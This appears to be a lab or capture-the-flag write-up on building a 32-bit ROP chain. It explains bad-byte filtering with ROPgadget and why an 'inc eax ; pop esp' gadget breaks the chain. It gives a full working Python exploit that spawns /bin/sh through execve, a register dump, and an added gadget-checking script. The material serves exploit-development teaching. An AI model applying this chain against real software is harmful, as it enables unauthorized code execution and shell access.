1. Avoid bad bytes
I used "ROPgadget.py --ropchain" to generate the ROP chain.
However, it didn't work because of bad bytes:
p += pack('<I', 0x0809a346) # inc eax ; ret
When the program read 0x09 (\t), it stopped reading the payload, so the rest of the chain never arrived.
$ ../ROPgadget.py --binary ./sample --ropchain --badbytes "20|00|09"
0x20 = space, 0x00 = NUL, 0x09 = \t
2. Don't pop esp
With the bad bytes excluded, it generates
p += pack('<I', 0x080c2105) # inc eax ; pop esp ; ret
p += pack('<I', 0x41414141) # padding
to replace
p += pack('<I', 0x0809a346) # inc eax ; ret
However, eax has to be incremented up to 11 (0xb, the execve syscall number), so this gadget runs many times.
The first time, pop esp loads 0x41414141 into esp.
The next pop then reads from address 0x41414141, which holds nothing usable,
and the chain breaks!
Chain it by yourself!
$ ../ROPgadget.py --binary ./sample | grep "inc eax"
and find this one
0x0805083c : inc eax ; pop edi ; ret
It only changes $edi to 0x41414141, which doesn't matter. Better!
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack

# Padding goes here
p = 'a'*32 # buff[20]

# write "/bin//sh\0" into .data
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080c2156) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef064) # @ .data + 4
p += pack('<I', 0x080c2156) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x080513d0) # xor eax, eax ; ret
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret

# ebx = "/bin//sh", ecx = edx = NULL
p += pack('<I', 0x080481ec) # pop ebx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080e3a8e) # pop ecx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8

# eax = 11 using the hand-picked gadget (11 x inc eax ; pop edi ; ret)
p += pack('<I', 0x080513d0) # xor eax, eax ; ret
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x080493b9) # int 0x80
print p
Mission complete!
[---------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0x80ef060 ("/bin//sh")
ECX: 0x80ef068 --> 0x0
EDX: 0x80ef068 --> 0x0
ESI: 0x0
EDI: 0x41414141 ('AAAA')
EBP: 0x61616161 ('aaaa')
ESP: 0xbffff2dc --> 0x0
EIP: 0x80493b9 (: int 0x80)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[----------------------------------------------------------------------]
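As an added example (not part of the original post), a small Python 3 checker for the two failure modes described above: it reports gadget addresses that contain bad bytes, gadgets that replace esp, and the offset at which an assembled payload would be cut off. The gadget addresses and the bad-byte set are the post's own; the sample payloads are constructed.

```python
from struct import pack

# Bad bytes from the post: space, NUL and tab. The sample's input routine
# stops at them, so any such byte truncates everything after it.
BAD_BYTES = frozenset({0x20, 0x00, 0x09})

# Gadgets quoted in the post (address -> ROPgadget disassembly).
GADGETS = {
    0x0809a346: "inc eax ; ret",
    0x080c2105: "inc eax ; pop esp ; ret",
    0x0805083c: "inc eax ; pop edi ; ret",
}

def bad_bytes_in(addr, bad=BAD_BYTES):
    """Bad bytes in the little-endian 32-bit encoding of addr, in byte order."""
    return [b for b in pack('<I', addr) if b in bad]

def clobbers_esp(disasm):
    """True if an instruction in the gadget replaces esp (pop/mov/xchg/lea with
    esp as an operand); the following 'pop' then reads from wherever esp now
    points (0x41414141 in the post's case) instead of from the chain."""
    for insn in disasm.split(';'):
        parts = insn.strip().split(None, 1)
        if len(parts) == 2 and parts[0] in ("pop", "mov", "xchg", "lea"):
            operands = [op.strip() for op in parts[1].split(',')]
            if "esp" in operands:
                return True
    return False

def check_gadget(addr, disasm, bad=BAD_BYTES):
    """Reasons this gadget would break the chain (empty list if it is usable)."""
    problems = []
    found = bad_bytes_in(addr, bad)
    if found:
        problems.append("bad bytes in address: "
                        + " ".join("0x%02x" % b for b in found))
    if clobbers_esp(disasm):
        problems.append("replaces esp")
    return problems

def first_bad_offset(payload, bad=BAD_BYTES):
    """Offset of the first bad byte in an assembled payload, or -1 if clean.
    Bytes from that offset onward are never delivered to the program."""
    for i, b in enumerate(payload):
        if b in bad:
            return i
    return -1

if __name__ == "__main__":
    for addr, disasm in GADGETS.items():
        print("0x%08x  %-26s %s" % (addr, disasm, check_gadget(addr, disasm) or "ok"))
```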